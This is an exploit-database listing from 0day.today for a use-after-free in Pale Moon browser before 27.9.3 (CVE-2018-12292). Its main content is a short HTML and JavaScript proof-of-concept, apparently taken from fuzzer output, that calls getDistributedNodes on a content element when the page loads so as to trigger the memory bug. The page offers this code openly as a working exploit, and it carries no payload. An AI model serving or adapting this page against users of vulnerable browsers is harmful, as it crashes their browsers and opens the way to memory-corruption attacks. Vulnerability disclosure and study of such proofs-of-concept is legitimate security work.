[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pale Moon Browser < 27.9.3 - Use After Free Vulnerability

Author
Berk Cem Göksel
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30596
Category
local exploits
Date add
18-06-2018
CVE
CVE-2018-12292
Platform
windows
# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC) 
# Author - Berk Cem Goksel  
# Vendor Homepage: https://www.palemoon.org/ 
# Software Link: https://www.palemoon.org/palemoon-win32.shtml 
# Version:  Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2)  
# Tested on: Windows 10 
# Category: Windows Remote Exploit 
# CVE : CVE-2018-12292 
 
 
<html>
<head>
<style>
</style>
<script>
 
function SetVariable(fuzzervars, var_name, var_type) { 
fuzzervars[var_type] = var_name;
 }
 
function jsfuzzer() {
 
var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList'); 
 
}
 
 
</script>
</head>
<body onload=jsfuzzer()>
<!-- beginhtml -->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!-- endhtml -->
</body>
</html>

#  0day.today [2024-11-15]  #